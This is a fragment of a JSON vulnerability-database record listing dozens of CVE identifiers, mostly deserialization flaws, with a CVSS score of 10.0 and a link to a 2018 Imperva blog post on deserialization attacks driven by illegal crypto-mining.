"obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4858", "CVE-2015-3253", "CVE-2015-4852", "CVE-2015-5254", "CVE-2015-5348", "CVE-2015-6420", "CVE-2015-6555", "CVE-2015-6576", "CVE-2015-6934", "CVE-2015-7253", "CVE-2015-7450", "CVE-2015-7501", "CVE-2015-8103", "CVE-2015-8237", "CVE-2015-8238", "CVE-2015-8360", "CVE-2015-8545", "CVE-2015-8581", "CVE-2015-8765", "CVE-2016-0714", "CVE-2016-0779", "CVE-2016-0788", "CVE-2016-0958", "CVE-2016-1291", "CVE-2016-1487", "CVE-2016-1985", "CVE-2016-1986", "CVE-2016-1997", "CVE-2016-1998", "CVE-2016-1999", "CVE-2016-2000", "CVE-2016-2003", "CVE-2016-2170", "CVE-2016-2173", "CVE-2016-2510", "CVE-2016-3415", "CVE-2016-3427", "CVE-2016-3461", "CVE-2016-3642", "CVE-2016-4372", "CVE-2016-4385", "CVE-2016-5004", "CVE-2016-5229", "CVE-2016-6809", "CVE-2016-7462", "CVE-2016-8735", "CVE-2016-8744", "CVE-2016-8749", "CVE-2016-9299", "CVE-2016-9606", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-11283", "CVE-2017-11284", "CVE-2017-12149", "CVE-2017-2608", "CVE-2017-3066", "CVE-2017-3159", "CVE-2017-5586", "CVE-2017-5638", "CVE-2017-5641", "CVE-2017-5645", "CVE-2017-5878", "CVE-2017-7504", "CVE-2017-9805", "CVE-2017-9830", "CVE-2017-9844"], "modified": "2018-01-24T17:45:08", "id": "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "href": "https://www.imperva.com/blog/2018/01/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}